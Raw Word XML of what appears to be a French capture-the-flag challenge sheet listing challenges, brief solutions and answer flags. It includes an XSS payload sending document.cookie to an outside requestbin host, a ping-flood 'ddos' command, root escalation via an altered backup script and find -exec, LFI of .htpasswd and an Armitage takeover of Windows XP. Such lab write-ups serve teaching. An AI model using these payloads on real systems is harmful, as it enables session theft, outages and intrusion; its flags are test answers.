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55" w:rsidRDefault="006E4964" w:rsidP="006E4964">
      <w:pPr>
        <w:pStyle w:val="Titre"/>
      </w:pPr>
      <w:r>
        <w:t>Documentation des Failles</w:t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cracking-031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cracking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Décompiler Programme C / MySQL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Décompiler Programme C puis trouver les ID MySQL pour pouvoir récupérer le flag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Capture d’écran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uncocalightsvp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uncocazerosvp</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellEnd"/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cracking-041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cracking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4145A3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Décompilation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APK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Décompiler l'application APK pour obtenir les identifiants de connexion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apk_decrypt123a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apk_decrypt123b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cryptanalyse-020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cryptanalyse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Android déverrouillage schéma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Trouver le schéma pour déverrouiller le téléphone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847630125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673840512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cryptanalyse-026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cryptanalyse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ELF Protection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Programme rédigé en C avec et compilé avec GCC32.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UGFzc2Vtb2lsZXNlbA==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Q2ZpbTBoQG1lZA==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cryptanalyse-027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cryptanalyse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Script Python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Deux niveaux de cryptage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Cfim0h@med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W@rCr@ft01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cryptanalyse-039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cryptanalyse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Analyse de </w:t>
      </w:r>
      <w:r w:rsidR="004145A3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données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personnelles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PREREQUIS : "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Challenge_Gmail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Grâce au compte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gmail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john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trouvez ses renseignements pour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decouvrir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flag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R3ns31gn3me3nts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D0nnees2J0hnny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cryptographie-016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cryptographie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Cisco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Enabled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Décryptage du mot de passe Enable.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en4ble_6sko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en@ble_6sko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ftp-017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ftp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FTP .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pcap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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Parcourir la trame pour trouver le mot de passe de connexion.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cdts3500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cdts3600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ftp-043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ftp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Capture de trame FTP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Il faut retrouver le mot de passe de connexion à un serveur FTP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bouffeunefrite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duselpourlesfrites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http-018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Injection SQL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Injection SQL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4dm1n1str@t0r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@dm1n1str4t0r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4145A3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http-019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Unescape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JS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Unescape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mot de passe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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="004145A3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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35A8FA7B" wp14:editId="4CA0461E">
            <wp:extent cx="5760720" cy="7391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Pr="004145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la fonction </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004145A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004145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la variable </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004145A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>pass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004145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utiliser la fonction </w:t>
      </w:r>
      <w:r w:rsid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 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsid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>fro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsid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; char code </w:t>
      </w:r>
      <w:r w:rsidRPr="004145A3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>encapsulée à l’intérieur</w:t>
      </w:r>
      <w:r w:rsid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hDufjdki156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ADufjdki156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4C43E1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http-021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includes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c'est pas sécure et les commentaires non </w:t>
      </w:r>
      <w:proofErr w:type="gram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plus..</w:t>
      </w:r>
      <w:proofErr w:type="gram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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="004C43E1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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42FAD52D" wp14:editId="167F998A">
            <wp:extent cx="5760720" cy="9112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le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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page pour entrer sur le serveur, et regarder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source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la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bdd.php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>index.php?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>bdd.php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M0nmdp$ecure123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M4bddest$ecure123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4C43E1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http-022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Bypass html identification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Contourner l'identification html et trouvez le mot de passe pour valider l'épreuve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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="004C43E1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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62B3A712" wp14:editId="48B80A30">
            <wp:extent cx="5029200" cy="1704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Analyser l’arborescence et accéder au .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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>htpasswd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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>index.php?page</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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>=admin/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004C43E1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>htpasswd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M0nmdp$ecure123htpasswd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C3siteE$tpasSecur3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317370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http-023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XSS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TeamA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vs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TeamB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Volez le cookie de session de l'autre équipe pour valider le flag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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="00317370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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="18431D04" wp14:editId="25031627">
            <wp:extent cx="5391150" cy="411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Pr="00317370">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Injecter ce code dans le chat &lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00317370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document.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00317370">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>(\'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00317370">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003173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src=\"http://requestbin.fullcontact.com/1ap2jla1?cookie==\'+document.cookie+\'\"&gt;aaaa&lt;/img&gt;\');&lt;/script&gt; et u</w:t>
      </w:r>
      <w:r w:rsidR="004C43E1" w:rsidRPr="00317370">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>tiliser un site de</w:t>
      </w:r>
      <w:r w:rsidRPr="003173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récolte de cookie pour récupérer le cookie (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00317370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requestbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0031737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ahahbi3njoueJ3su6slefl4g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ohohcbi3njoueJ3su6slefl4g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http-024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Formulaire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Trouver le mot de passe afin de valider le défi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hackmoilesel78280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starwarsdarkvador78280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http-025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Challenge_Gmail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Retrouvez le mot de passe de la boîte Gmail pour capturer le Flag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cetaitpassiduraufinal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cesttropfacilequandmeme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http-028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Double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Trouver le bon mot de passe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marvelspiderman551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Hosttorvpn12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http-030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Open_Redirect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Réussissez à faire une redirection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BatmanestBruceWayne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SupermanestClarkKent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http-032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http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Mot de passe faible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Ne cherchez pas trop loin, c'est vraiment facile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admin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net-029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net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Capture Ethernet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Hex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 and String base64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Laconversionc'estcoolbravo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Laconversionc'estcoolbienjoue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net-035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net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de trames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Analysez le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réseau et capturez la trame UDP qui s'échappe du serveur !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J3SU1SL3FL4GA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J3SU1SL3FL4GB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757341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net-038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net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757341" w:rsidRPr="00757341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Faire un</w:t>
      </w:r>
      <w:r w:rsidR="00757341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757341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Indisponibilité de Service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Effectuer </w:t>
      </w:r>
      <w:r w:rsidR="00757341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une attaque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type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DDos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afin de </w:t>
      </w:r>
      <w:r w:rsidR="00757341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surcharger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site web et obtenir le flag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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="008C6586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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33E5628C" wp14:editId="4DEB827C">
            <wp:extent cx="5553075" cy="13525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757341" w:rsidRPr="007573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Lancer cette commande de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00757341" w:rsidRPr="00757341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>ddos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00757341" w:rsidRPr="007573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ping -i 0 -s 65000 IP » à partir de plusieurs terminaux pour monter à un débit de 10mb/s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LaTeamSiicEstVraimentLaMeilleure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LesDevsDeLaTeamSiicSontVraimentLesMeilleurs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66465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net-040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net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Historique Appel VOIP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Il faut inspecter les historiques de conversations et trouver l'identifiant et mot de passe administrateur.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@mobcz+123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321+zcbom@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8C6586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ssh-036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ssh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Clé publique dans la nature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Trouvez la clé publique pour </w:t>
      </w:r>
      <w:r w:rsidR="008C658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accéder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serveur et </w:t>
      </w:r>
      <w:r w:rsidR="008C658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récupérer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flag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</w:p>
    <w:p w:rsidR="008C6586" w:rsidRDefault="008C6586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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="303DF6E2" wp14:editId="71F75412">
            <wp:extent cx="5760720" cy="25679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Pr="008C65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une fonction javascript pour </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C6586">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>decrypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C65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8C6586">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>tout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C65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lien</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C6586">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>, et pouvoir trouver le lien contenant la clé prive de connexion au server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6586" w:rsidRPr="008C6586" w:rsidRDefault="008C6586" w:rsidP="00B5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var</w:t>
      </w:r>
      <w:proofErr w:type="spell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links = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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document.getElementsByTagName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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("a"); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6586" w:rsidRPr="008C6586" w:rsidRDefault="008C6586" w:rsidP="00B5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for (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var</w:t>
      </w:r>
      <w:proofErr w:type="spell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0; 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&lt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gram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links.length</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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; 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++) { </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6586" w:rsidRPr="008C6586" w:rsidRDefault="008C6586" w:rsidP="00B5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var</w:t>
      </w:r>
      <w:proofErr w:type="spell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data= links[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proofErr w:type="gram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].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href</w:t>
      </w:r>
      <w:proofErr w:type="gram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.replace</w:t>
      </w:r>
      <w:proofErr w:type="spell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('</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="008C65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fr-FR"/>
          </w:rPr>
          <w:t>http://11.0.0.13/',''</w:t>
        </w:r>
      </w:hyperlink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8C6586" w:rsidRPr="008C6586" w:rsidRDefault="008C6586" w:rsidP="00B5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  <w:t>links[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proofErr w:type="gram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].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setAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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("data", data); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6586" w:rsidRPr="008C6586" w:rsidRDefault="008C6586" w:rsidP="00B5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  <w:t>links[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proofErr w:type="gram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].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href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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atob</w:t>
      </w:r>
      <w:proofErr w:type="spell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(links[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].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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getAttribute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C6586">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>('data'));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6586" w:rsidRPr="008C6586" w:rsidRDefault="008C6586" w:rsidP="00B5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C6586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664656" w:rsidRDefault="00664656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proofErr w:type="spellStart"/>
      <w:r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priceless_bhabha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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proofErr w:type="spellStart"/>
      <w:r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gallant_elion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r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58436E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system-033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8C658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Elévation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privilèges - Backup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Découverte du flag dans le dossier /home/toto au travers de l'utilisation du script backup.sh dans /var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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="0058436E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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="784A138B" wp14:editId="48E62D1F">
            <wp:extent cx="3752850" cy="1085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Pr="0058436E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8C6586" w:rsidRPr="0058436E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>jouter la commande chmod 777 /home/toto/flag.txt au script /var/backup.sh pour débloquer les droits et lire le fichier flag.txt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FlagA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FlagB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5D4982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system-034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Elevation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privilèges -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5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les droits attribués à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lire le fichier flag.txt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</w:p>
    <w:p w:rsidR="005D4982" w:rsidRDefault="005D4982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>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B5D9BB3" wp14:editId="41C29748">
            <wp:extent cx="5476875" cy="5429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Pr="005D49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la commande </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D4982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D49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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D4982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5D49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lancer des commandes en root et pouvoir lire le fichier flag.txt</w:t>
      </w:r>
      <w:r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</w:p>
    <w:p w:rsidR="00664656" w:rsidRDefault="005D4982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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005D4982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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005D49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D4982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5D49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flag.txt -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D4982">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005D49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cat flag.txt \;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A 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mcGyverIsTheBestManEver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mcGyv3rIsTheB3st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4656" w:rsidRDefault="00664656" w:rsidP="00B53C79">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00316A0F" w:rsidRDefault="006C7DCF" w:rsidP="00B53C79">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/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</w:pP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lastRenderedPageBreak/>
        <w:t>Nom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winxp-037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Catégorie de la faille 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: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winxp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Objectif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Hack - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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Remote</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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control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Difficulté de la faille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Description de la faille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Infectez la machine et prenez son </w:t>
      </w:r>
      <w:r w:rsidR="00507B11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contrôle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Capture d’écran :</w:t>
      </w:r>
      <w:r w:rsidR="00664656" w:rsidRPr="00664656">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006E4964" w:rsidRDefault="00316A0F" w:rsidP="00B53C79">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23D9DF40" wp14:editId="125EBC15">
            <wp:extent cx="2253181" cy="13792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899" cy="13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Solution : </w:t>
      </w:r>
      <w:r w:rsidRPr="00316A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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Armitage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316A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Kali linux pour infecter la machine </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00316A0F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00316A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prendre le contrôle et accéder au bureau pour voir le flag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>Flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 de la faille A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FLAGWINXPA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C7DCF" w:rsidRPr="006C7DCF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag de la faille B : </w:t>
      </w:r>
      <w:r w:rsidR="00664656" w:rsidRPr="00664656">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>FLAGWINXPB</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006E4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64"/>
    <w:rsid w:val="00006FC1"/>
    <w:rsid w:val="00316A0F"/>
    <w:rsid w:val="00317370"/>
    <w:rsid w:val="004145A3"/>
    <w:rsid w:val="00427832"/>
    <w:rsid w:val="004C43E1"/>
    <w:rsid w:val="00507B11"/>
    <w:rsid w:val="0058436E"/>
    <w:rsid w:val="005D4982"/>
    <w:rsid w:val="00616A1E"/>
    <w:rsid w:val="00664656"/>
    <w:rsid w:val="006C7DCF"/>
    <w:rsid w:val="006E4964"/>
    <w:rsid w:val="00757341"/>
    <w:rsid w:val="00875F55"/>
    <w:rsid w:val="008C6586"/>
    <w:rsid w:val="00AE396C"/>
    <w:rsid w:val="00B51B14"/>
    <w:rsid w:val="00B53C79"/>
    <w:rsid w:val="00B83DFF"/>
    <w:rsid w:val="00B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75773E-5AF5-4FFB-AD24-56C786EB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496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E4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4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l-c">
    <w:name w:val="pl-c"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0031737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C6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C658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C6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11.0.0.13/',''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28</Pages>
  <Words>1624</Words>
  <Characters>8932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Gwendal</cp:lastModifiedBy>
  <cp:revision>12</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-03-20T08:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-20T09:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>